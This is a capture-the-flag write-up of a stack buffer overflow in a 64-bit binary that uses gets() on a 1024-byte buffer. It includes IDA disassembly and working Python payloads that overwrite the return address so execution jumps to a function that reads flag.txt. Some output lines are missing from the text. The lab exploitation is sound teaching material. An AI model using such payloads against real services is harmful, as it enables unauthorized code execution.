A vulnerable service is running here:
nc whale.hacking-lab.com 5777
You have the binary of the service. Analyze it, find a vulnerability, and then exploit the server to get the flag!
What happens if you input a veeeeeeeeeery long string?
Based on the name of this challenge and the hint, this appears to be a stackoverflow. I opened this up in IDA and saw the main function code:
var_410= qword ptr -410h var_404= dword ptr -404h s= byte ptr -400h push rbp mov rbp, rsp sub rsp, 410h mov [rbp+var_404], edi mov [rbp+var_410], rsi lea rdi, s ; "Input, please! >>----------> " call _puts mov rax, cs:__bss_start mov rdi, rax ; stream call _fflush lea rax, [rbp+s] mov rdi, rax mov eax, 0 call _gets lea rax, [rbp+s] mov rdi, rax ; s call _puts mov eax, 0 leave retn main endp
There is also a function called
flag in the binary, which reads a file called flag.txt:
push rbp mov rbp, rsp sub rsp, 410h lea rsi, modes ; "r" lea rdi, filename ; "flag.txt" call _fopen
So our goal is to get this function called. Locally I created a flag.txt and then started hacking on the assembly. The address for the flag function is
0x0000000000400676. Knowing that this is a 64-bit assembly is important to make sure we put the full address into the payload.
Looking at the main assembly, I see that s is allocated
0x400 or 1024 bytes. So I created a text file using a python script and decided to try and completely smash the stack:
python -c "print '\x76\x06\x40\x00\x00\x00\x00\x00'*200" > payload.txt
I piped the output of my payload to the local binary and got the contents of my
cat payload.txt | ./stack
So then I tried with
netcat and got the result:
*Note: After talking with others on this solution, a more targeted python script to overwrite a single instruction would be:
python -c "print 'a'*1032 + '\x76\x06\x40\x00\x00\x00\x00\x00'" > payload.txt
The extra 8 bytes move us far enough down the stack to overwrite the return address for the function.